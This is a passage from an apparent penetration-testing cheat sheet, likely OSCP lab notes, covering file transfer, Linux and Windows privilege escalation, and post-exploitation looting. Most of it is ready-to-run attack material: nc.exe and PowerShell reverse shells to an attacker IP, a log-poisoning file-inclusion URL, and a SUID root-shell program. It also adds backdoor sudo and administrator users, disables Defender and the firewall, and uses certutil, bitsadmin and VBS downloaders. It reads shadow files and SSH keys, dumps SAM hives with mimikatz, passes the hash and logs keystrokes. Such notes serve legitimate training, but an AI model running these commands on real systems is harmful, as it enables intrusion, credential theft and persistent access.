anonymous write access) 1249 | python -m pyftpdlib -p 21 -w 1250 | ``` 1251 | 1252 | ### Set up TFTP 1253 | 1254 | ```` 1255 | # In Kali 1256 | atftpd --daemon --port 69 /tftp 1257 | 1258 | # In reverse Windows 1259 | tftp -i 10.11.1.111 GET nc.exe 1260 | nc.exe -e cmd.exe 10.11.1.111 4444 1261 | 1262 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444 1263 | ```` 1264 | 1265 | ## Linux 1266 | 1267 | Now we start the whole enumeration-process over gain. 1268 | 1269 | - Kernel exploits 1270 | - Programs running as root 1271 | - Installed software 1272 | - Weak/reused/plaintext passwords 1273 | - Inside service 1274 | - Suid misconfiguration 1275 | - World writable scripts invoked by root 1276 | - Unmounted filesystems 1277 | - Look in /var/backups 1278 | - Look in /etc/fstab y en mount 1279 | 1280 | Less likely 1281 | 1282 | - Private ssh keys 1283 | - Bad path configuration 1284 | - Cronjobs 1285 | 1286 | ### Useful commands 1287 | 1288 | ``` 1289 | # Spawning shell 1290 | python -c 'import pty; pty.spawn("/bin/bash")' 1291 | python -c 'import pty; pty.spawn("/bin/sh")' 1292 | V 1293 | Ctrl+Z 1294 | stty raw -echo 1295 | fg 1296 | reset 1297 | Ctrl+Z 1298 | stty size 1299 | stty -rows 48 -columns 120 1300 | fg 1301 | 1302 | echo os.system('/bin/bash') 1303 | /bin/sh -i 1304 | perl -e 'exec "/bin/sh";' 1305 | perl: exec "/bin/sh"; 1306 | ruby: exec "/bin/sh" 1307 | lua: os.execute('/bin/sh') 1308 | (From within vi) 1309 | :!bash 1310 | :set shell=/bin/bash:shell 1311 | (From within nmap) 1312 | !sh 1313 | 1314 | # Access to more binaries 1315 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 1316 | 1317 | # Set up webserver 1318 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 1319 | 1320 | # Download all files 1321 | wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check 1322 | 1323 | ./LinEnum.sh -t -k password -r LinEnum.txt 1324 | python linprivchecker.py extended 1325 | ./unix-privesc-check standard 1326 | 1327 | # Writable directories 1328 | /tmp 1329 | /var/tmp 1330 | 1331 | # Add user to sudoers 1332 | useradd hacker 1333 | passwd hacker 1334 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers 1335 | ``` 1336 | 1337 | ### Basic info 1338 | 1339 | ``` 1340 | uname -a 1341 | env 1342 | id 1343 | cat /proc/version 1344 | cat /etc/issue 1345 | cat /etc/passwd 1346 | cat /etc/group 1347 | cat /etc/shadow 1348 | cat /etc/hosts 1349 | 1350 | # Users with login 1351 | grep -vE "nologin" /etc/passwd 1352 | 1353 | # Priv Enumeration Scripts 1354 | upload /unix-privesc-check 1355 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ 1356 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ 1357 | 1358 | python linprivchecker.py extended 1359 | ./LinEnum.sh -t -k password 1360 | unix-privesc-check 1361 | ``` 1362 | 1363 | ### Kernel exploits 1364 | 1365 | ``` 1366 | site:exploit-db.com kernel version 1367 | 1368 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 1369 | 1370 | python linprivchecker.py extended 1371 | ``` 1372 | 1373 | ### Programs running as root 1374 | 1375 | Look for webserver, mysql or anything else like that. 1376 | 1377 | ``` 1378 | # Metasploit 1379 | ps 1380 | 1381 | # Linux 1382 | ps aux 1383 | ``` 1384 | 1385 | ### Installed software 1386 | 1387 | ``` 1388 | /usr/local/ 1389 | /usr/local/src 1390 | /usr/local/bin 1391 | /opt/ 1392 | /home 1393 | /var/ 1394 | /usr/src/ 1395 | 1396 | # Debian 1397 | dpkg -l 1398 | 1399 | # CentOS, OpenSuse, Fedora, RHEL 1400 | rpm -qa (CentOS / openSUSE ) 1401 | 1402 | # OpenBSD, FreeBSD 1403 | pkg_info 1404 | ``` 1405 | 1406 | ### Weak/reused/plaintext passwords 1407 | 1408 | - Check database config-file 1409 | - Check databases 1410 | - Check weak passwords 1411 | 1412 | ``` 1413 | username:username 1414 | username:username1 1415 | username:root 1416 | username:admin 1417 | username:qwerty 1418 | username:password 1419 | ``` 1420 | 1421 | - Check plaintext 1422 | 1423 | ``` 1424 | ./LinEnum.sh -t -k password 1425 | ``` 1426 | 1427 | ### Inside service 1428 | 1429 | ``` 1430 | # Linux 1431 | netstat -anlp 1432 | netstat -ano 1433 | ``` 1434 | 1435 | ### Suid misconfiguration 1436 | 1437 | Binary with suid permission can be run by anyone, but when they are run they are run as root! 1438 | 1439 | Example programs: 1440 | 1441 | ``` 1442 | nmap 1443 | vim 1444 | nano 1445 | ``` 1446 | 1447 | ``` 1448 | # SUID 1449 | find / -perm -4000 -type f 2>/dev/null 1450 | 1451 | # ALL PERMS 1452 | find / -perm -777 -type f 2>/dev/null 1453 | 1454 | # SUID for current user 1455 | find / perm /u=s -user `whoami` 2>/dev/null 1456 | find / -user root -perm -4000 -print 2>/dev/null 1457 | 1458 | # Writables for current user/group 1459 | find / perm /u=w -user `whoami` 2>/dev/null 1460 | find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null 1461 | find / -perm /u+w -user `whoami` 2>/dev/nul 1462 | 1463 | # Dirs with +w perms for current u/g 1464 | find / perm /u=w -type -d -user `whoami` 2>/dev/null 1465 | find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null 1466 | ``` 1467 | 1468 | ### Unmounted filesystems 1469 | 1470 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. 1471 | 1472 | ``` 1473 | mount -l 1474 | ``` 1475 | 1476 | ### Cronjob 1477 | 1478 | Look for anything that is owned by privileged user but writable for you 1479 | 1480 | ``` 1481 | crontab -l 1482 | ls -alh /var/spool/cron 1483 | ls -al /etc/ | grep cron 1484 | ls -al /etc/cron* 1485 | cat /etc/cron* 1486 | cat /etc/at.allow 1487 | cat /etc/at.deny 1488 | cat /etc/cron.allow 1489 | cat /etc/cron.deny 1490 | cat /etc/crontab 1491 | cat /etc/anacrontab 1492 | cat /var/spool/cron/crontabs/root 1493 | ``` 1494 | 1495 | ### SSH Keys 1496 | 1497 | Check all home directories 1498 | 1499 | ``` 1500 | cat ~/.ssh/authorized_keys 1501 | cat ~/.ssh/identity.pub 1502 | cat ~/.ssh/identity 1503 | cat ~/.ssh/id_rsa.pub 1504 | cat ~/.ssh/id_rsa 1505 | cat ~/.ssh/id_dsa.pub 1506 | cat ~/.ssh/id_dsa 1507 | cat /etc/ssh/ssh_config 1508 | cat /etc/ssh/sshd_config 1509 | cat /etc/ssh/ssh_host_dsa_key.pub 1510 | cat /etc/ssh/ssh_host_dsa_key 1511 | cat /etc/ssh/ssh_host_rsa_key.pub 1512 | cat /etc/ssh/ssh_host_rsa_key 1513 | cat /etc/ssh/ssh_host_key.pub 1514 | cat /etc/ssh/ssh_host_key 1515 | ``` 1516 | 1517 | ### Bad path configuration 1518 | 1519 | Require user interaction 1520 | 1521 | ### Find plain passwords 1522 | 1523 | ``` 1524 | grep -rnw '/' -ie 'pass' --color=always 1525 | grep -rnw '/' -ie 'DB_PASS' --color=always 1526 | grep -rnw '/' -ie 'DB_PASSWORD' --color=always 1527 | grep -rnw '/' -ie 'DB_USER' --color=always 1528 | ``` 1529 | 1530 | ### Scripts 1531 | 1532 | #### SUID 1533 | 1534 | ``` 1535 | int main(void){ 1536 | setresuid(0, 0, 0); 1537 | system("/bin/bash"); 1538 | } 1539 | 1540 | # Compile 1541 | gcc suid.c -o suid 1542 | ``` 1543 | 1544 | #### PS Monitor for cron 1545 | 1546 | ``` 1547 | #!/bin/bash 1548 | 1549 | # Loop by line 1550 | IFS=$'\n' 1551 | 1552 | old_process=$(ps -eo command) 1553 | 1554 | while true; do 1555 | new_process=$(ps -eo command) 1556 | diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] 1557 | sleep 1 1558 | old_process=$new_process 1559 | done 1560 | 1561 | ``` 1562 | 1563 | ### Linux Privesc Tools 1564 | 1565 | - [GTFOBins](https://gtfobins.github.io/) 1566 | - [LinEnum](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) 1567 | - [LinuxExploitSuggester](https://gitlab.com/kalilinux/packages/linux-exploit-suggester/blob/kali/master/Linux_Exploit_Suggester.pl) 1568 | - [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) 1569 | 1570 | ### Linux Precompiled Exploits 1571 | - [kernel-exploits](https://github.com/lucyoa/kernel-exploits) 1572 | 1573 | ## Windows 1574 | 1575 | Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order. 1576 | 1577 | - Kernel exploits 1578 | - Cleartext password 1579 | - Reconfigure service parameters 1580 | - Inside service 1581 | - Program running as root 1582 | - Installed software 1583 | - Scheduled tasks 1584 | - Weak passwords 1585 | 1586 | ### Basic info 1587 | 1588 | ``` 1589 | systeminfo 1590 | set 1591 | hostname 1592 | net users 1593 | net user user1 1594 | net localgroups 1595 | accesschk.exe -uwcqv "Authenticated Users" * 1596 | 1597 | netsh firewall show state 1598 | netsh firewall show config 1599 | 1600 | # Set path 1601 | set PATH=%PATH%;C:\xampp\php 1602 | 1603 | whoami /priv 1604 | 1605 | dir/a -> Show hidden & unhidden files 1606 | dir /Q -> Show permissions 1607 | ``` 1608 | 1609 | ### Kernel exploits 1610 | 1611 | 1612 | ``` 1613 | # Look for hotfixes 1614 | systeminfo 1615 | 1616 | wmic qfe get Caption,Description,HotFixID,InstalledOn 1617 | 1618 | # Search for exploits 1619 | site:exploit-db.com windows XX XX 1620 | ``` 1621 | 1622 | ### Cleartext passwords 1623 | 1624 | ``` 1625 | # Windows autologin 1626 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 1627 | 1628 | # VNC 1629 | reg query "HKCU\Software\ORL\WinVNC3\Password" 1630 | 1631 | # SNMP Parameters 1632 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 1633 | 1634 | # Putty 1635 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 1636 | 1637 | # Search for password in registry 1638 | reg query HKLM /f password /t REG_SZ /s 1639 | reg query HKCU /f password /t REG_SZ /s 1640 | ``` 1641 | 1642 | ### Reconfigure service parameters 1643 | 1644 | - Unquoted service paths 1645 | 1646 | - Weak service permissions 1647 | 1648 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ 1649 | 1650 | ### Dump process for passwords 1651 | 1652 | ```powershell 1653 | # Looking for Firefox 1654 | Get-Process 1655 | ./procdump64.exe -ma $PID-FF 1656 | Select-String -Path .\*.dmp -Pattern 'password' > 1.txt 1657 | type 1.txt | findstr /s /i "admin" 1658 | ``` 1659 | 1660 | ### Inside service 1661 | 1662 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside. 1663 | 1664 | ``` 1665 | # Meterpreter 1666 | run get_local_subnets 1667 | 1668 | netstat /a 1669 | netstat -ano 1670 | ``` 1671 | 1672 | ### Programs running as root/system 1673 | 1674 | ### Installed software 1675 | 1676 | ``` 1677 | # Metasploit 1678 | ps 1679 | 1680 | tasklist /SVC 1681 | net start 1682 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 1683 | DRIVERQUERY 1684 | 1685 | Look in: 1686 | C:\Program files 1687 | C:\Program files (x86) 1688 | Home directory of the user 1689 | ``` 1690 | 1691 | ### Scheduled tasks 1692 | 1693 | ``` 1694 | schtasks /query /fo LIST /v 1695 | 1696 | Check this file: 1697 | c:\WINDOWS\SchedLgU.Txt 1698 | ``` 1699 | 1700 | ### Weak passwords 1701 | 1702 | Remote desktop 1703 | 1704 | ``` 1705 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://10.11.1.111 1706 | ``` 1707 | 1708 | ### Add user and enable RDP 1709 | 1710 | ``` 1711 | # Add new user 1712 | 1713 | net user haxxor Haxxor123 /add 1714 | net localgroup Administrators haxxor /add 1715 | net localgroup "Remote Desktop Users" haxxor /ADD 1716 | 1717 | # Turn firewall off and enable RDP 1718 | 1719 | sc stop WinDefend 1720 | netsh advfirewall show allprofiles 1721 | netsh advfirewall set allprofiles state off 1722 | netsh firewall set opmode disable 1723 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 1724 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 1725 | ``` 1726 | 1727 | ### Powershell sudo for Windows 1728 | 1729 | ``` 1730 | $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force 1731 | $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw 1732 | $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat" 1733 | Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' 1734 | 1735 | powershell -ExecutionPolicy Bypass -File xyz.ps1 1736 | ``` 1737 | 1738 | ### Windows download with bitsadmin 1739 | 1740 | ``` 1741 | bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe 1742 | ``` 1743 | 1744 | ### Windows download with certutil.exe 1745 | 1746 | ``` 1747 | certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat 1748 | ``` 1749 | 1750 | ### Windows download with powershell 1751 | 1752 | ```` 1753 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\user\Desktop\file.exe')" 1754 | 1755 | (New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list") 1756 | ```` 1757 | 1758 | ### Windows Download from FTP 1759 | 1760 | ``` 1761 | # In reverse shell 1762 | echo open 10.11.1.111 > ftp.txt 1763 | echo USER anonymous >> ftp.txt 1764 | echo ftp >> ftp.txt 1765 | echo bin >> ftp.txt 1766 | echo GET file >> ftp.txt 1767 | echo bye >> ftp.txt 1768 | 1769 | # Execute 1770 | ftp -v -n -s:ftp.txt 1771 | ``` 1772 | 1773 | ### Windows create SMB Server transfer files 1774 | 1775 | ```bash 1776 | # Attack machine 1777 | python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" 1778 | 1779 | # Or SMB service 1780 | # http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html 1781 | vim /etc/samba/smb.conf 1782 | [global] 1783 | workgroup = WORKGROUP 1784 | server string = Samba Server %v 1785 | netbios name = indishell-lab 1786 | security = user 1787 | map to guest = bad user 1788 | name resolve order = bcast host 1789 | dns proxy = no 1790 | bind interfaces only = yes 1791 | 1792 | [ica] 1793 | path = /var/www/html/pub 1794 | writable = no 1795 | guest ok = yes 1796 | guest only = yes 1797 | read only = yes 1798 | directory mode = 0555 1799 | force user = nobody 1800 | 1801 | chmod -R 777 smb_path 1802 | chown -R nobody:nobody smb_path 1803 | service smbd restart 1804 | 1805 | # Victim machine with reverse shell 1806 | Download: copy \\10.11.1.111\Lab\wce.exe . 1807 | Upload: copy wtf.jpg \\10.11.1.111\Lab 1808 | 1809 | ``` 1810 | 1811 | ### Windows download with VBS 1812 | 1813 | ```` 1814 | # In reverse shell 1815 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 1816 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 1817 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 1818 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 1819 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 1820 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 1821 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs 1822 | echo Err.Clear >> wget.vbs 1823 | echo Set http = Nothing >> wget.vbs 1824 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 1825 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 1826 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 1827 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 1828 | echo http.Open "GET",strURL,False >> wget.vbs 1829 | echo http.Send >> wget.vbs 1830 | echo varByteArray = http.ResponseBody >> wget.vbs 1831 | echo Set http = Nothing >> wget.vbs 1832 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 1833 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs 1834 | echo strData = "" >> wget.vbs 1835 | echo strBuffer = "" >> wget.vbs 1836 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 1837 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs 1838 | echo Next >> wget.vbs 1839 | echo ts.Close >> wget.vbs 1840 | 1841 | # Execute 1842 | cscript wget.vbs http://10.11.1.111/file.exe file.exe 1843 | ```` 1844 | 1845 | ### Windowss XP SP1 PrivEsc 1846 | 1847 | ```bash 1848 | sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe" 1849 | sc config upnphost obj= ".\LocalSystem" password= "" 1850 | sc qc upnphost 1851 | sc config upnphost depend= "" 1852 | net start upnphost 1853 | ``` 1854 | 1855 | ### Pass The Hash 1856 | 1857 | ``` 1858 | # Login as user only with hashdump 1859 | # From this hashdump 1860 | # admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7::: 1861 | 1862 | msf5 > use exploit/windows/smb/psexec 1863 | msf5 exploit(windows/smb/psexec) > options 1864 | 1865 | Module options (exploit/windows/smb/psexec): 1866 | 1867 | Name Current Setting Required Description 1868 | ---- --------------- -------- ----------- 1869 | RHOSTS yes The target address range or CIDR identifier 1870 | RPORT 445 yes The SMB service port (TCP) 1871 | SERVICE_DESCR10.11.1.111TION no Service description to to be used on target for pretty listing 1872 | SERVICE_DISPLAY_NAME no The service display name 1873 | SERVICE_NAME no The service name 1874 | SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share 1875 | SMBDomain . no The Windows domain to use for authentication 1876 | SMBPass no The password for the specified username 1877 | SMBUser no The username to authenticate as 1878 | 1879 | Exploit target: 1880 | 1881 | Id Name 1882 | -- ---- 1883 | 0 Automatic 1884 | 1885 | msf5 exploit(windows/smb/psexec) > set rhosts 10.10.0.100 1886 | rhosts => 10.10.0.100 1887 | 1888 | msf5 exploit(windows/smb/psexec) > set smbuser admin2 1889 | 1890 | smbuser => admin2 1891 | 1892 | msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7 1893 | 1894 | smbpass => aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7 1895 | 1896 | msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp 1897 | 1898 | payload => windows/x64/meterpreter/reverse_tcp 1899 | 1900 | ``` 1901 | 1902 | ### Scripts 1903 | 1904 | #### Useradd 1905 | 1906 | ```` 1907 | #include /* system, NULL, EXIT_FAILURE */ 1908 | 1909 | int main () 1910 | { 1911 | int i; 1912 | i=system ("net user /add && net localgroup administrators /add"); 1913 | return 0; 1914 | } 1915 | 1916 | # Compile 1917 | i686-w64-mingw32-gcc -o useradd.exe useradd.c 1918 | ```` 1919 | 1920 | #### Powershell Run As 1921 | 1922 | ``` 1923 | echo $username = '' > runas.ps1 1924 | echo $securePassword = ConvertTo-SecureString "" -AsPlainText -Force >> runas.ps1 1925 | echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1 1926 | echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1 1927 | ``` 1928 | 1929 | #### Powershell Reverse Shell 1930 | 1931 | ```powershell 1932 | Set-ExecutionPolicy Bypass 1933 | 1934 | $client = New-Object System.Net.Sockets.TCPClient('10.11.1.111',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 1935 | ``` 1936 | 1937 | 1938 | 1939 | ### Windows privesc/enum tools 1940 | 1941 | - [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) 1942 | - [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check) 1943 | - [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) 1944 | 1945 | ### Windows precompiled exploits 1946 | 1947 | - [WindowsExploits](https://github.com/abatchy17/WindowsExploits) 1948 | 1949 | ### Windows Port Forwarding 1950 | 1951 | Run in victim (5985 WinRM): 1952 | 1953 | `plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221` 1954 | 1955 | 1956 | 1957 | # **Loot** 1958 | 1959 | ## Linux 1960 | 1961 | **Checklist** 1962 | 1963 | - Proof: 1964 | - Network secret: 1965 | - Passwords and hashes: 1966 | - Dualhomed: 1967 | - Tcpdump: 1968 | - Interesting files: 1969 | - Databases: 1970 | - SSH-keys: 1971 | - Browser: 1972 | - Mail: 1973 | 1974 | ### Proof 1975 | ``` 1976 | echo -e '\n'HOSTNAME: && hostname && echo -e '\n'WHOAMI: && whoami && echo -e '\n'PROOF: && cat proof.txt && echo -e '\n'IFCONFIG: && /sbin/ifconfig && echo -e '\n'PASSWD: && cat /etc/passwd && echo -e '\n'SHADOW: && cat /etc/shadow && echo -e '\n'NETSTAT: && netstat -antup 1977 | ``` 1978 | 1979 | 1980 | ### Network secret 1981 | 1982 | ``` 1983 | /root/network-secret.txt 1984 | ``` 1985 | 1986 | ### Passwords and hashes 1987 | 1988 | ``` 1989 | cat /etc/passwd 1990 | cat /etc/shadow 1991 | 1992 | unshadow passwd shadow > unshadowed.txt 1993 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 1994 | ``` 1995 | 1996 | ### Dualhomed 1997 | 1998 | ``` 1999 | ifconfig 2000 | ifconfig -a 2001 | arp -a 2002 | ``` 2003 | 2004 | ### Tcpdump 2005 | 2006 | ``` 2007 | tcpdump -i any -s0 -w capture.pcap 2008 | tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111 2009 | tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111 2010 | ``` 2011 | 2012 | ### Interesting files 2013 | 2014 | ``` 2015 | #Meterpreter 2016 | search -f *.txt 2017 | search -f *.zip 2018 | search -f *.doc 2019 | search -f *.xls 2020 | search -f config* 2021 | search -f *.rar 2022 | search -f *.docx 2023 | search -f *.sql 2024 | use auxiliary/sniffer/psnuffle 2025 | 2026 | .ssh: 2027 | .bash_history 2028 | ``` 2029 | 2030 | ### Databases 2031 | 2032 | ### SSH-Keys 2033 | 2034 | ### Browser 2035 | 2036 | ### Mail 2037 | 2038 | ``` 2039 | /var/mail 2040 | /var/spool/mail 2041 | ``` 2042 | 2043 | ### GUI 2044 | 2045 | If there is a gui we want to check out the browser. 2046 | 2047 | ``` 2048 | echo $DESKTOP_SESSION 2049 | echo $XDG_CURRENT_DESKTOP 2050 | echo $GDMSESSION 2051 | ``` 2052 | 2053 | ## Windows 2054 | 2055 | ### Proof 2056 | ``` 2057 | hostname && whoami.exe && type proof.txt && ipconfig /all 2058 | ``` 2059 | 2060 | ### Passwords and hashes 2061 | 2062 | ``` 2063 | wce32.exe -w 2064 | wce64.exe -w 2065 | fgdump.exe 2066 | 2067 | # Loot passwords without tools 2068 | reg.exe save hklm\sam c:\sam_backup 2069 | reg.exe save hklm\security c:\security_backup 2070 | reg.exe save hklm\system c:\system 2071 | 2072 | # Meterpreter 2073 | hashdump 2074 | load mimikatz 2075 | msv 2076 | ``` 2077 | 2078 | ### Dualhomed 2079 | 2080 | ``` 2081 | ipconfig /all 2082 | route print 2083 | 2084 | # What other machines have been connected 2085 | arp -a 2086 | ``` 2087 | 2088 | ### Tcpdump 2089 | 2090 | ``` 2091 | # Meterpreter 2092 | run packetrecorder -li 2093 | run packetrecorder -i 1 2094 | ``` 2095 | 2096 | ### Interesting files 2097 | 2098 | ``` 2099 | #Meterpreter 2100 | search -f *.txt 2101 | search -f *.zip 2102 | search -f *.doc 2103 | search -f *.xls 2104 | search -f config* 2105 | search -f *.rar 2106 | search -f *.docx 2107 | search -f *.sql 2108 | hashdump 2109 | keysscan_start 2110 | keyscan_dump 2111 | keyscan_stop 2112 | webcam_snap 2113 | 2114 | # How to cat files in meterpreter 2115 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt 2116 | 2117 | # Recursive search 2118 | dir /s 2119 | ``` 2120 | --------------------------------------------------------------------------------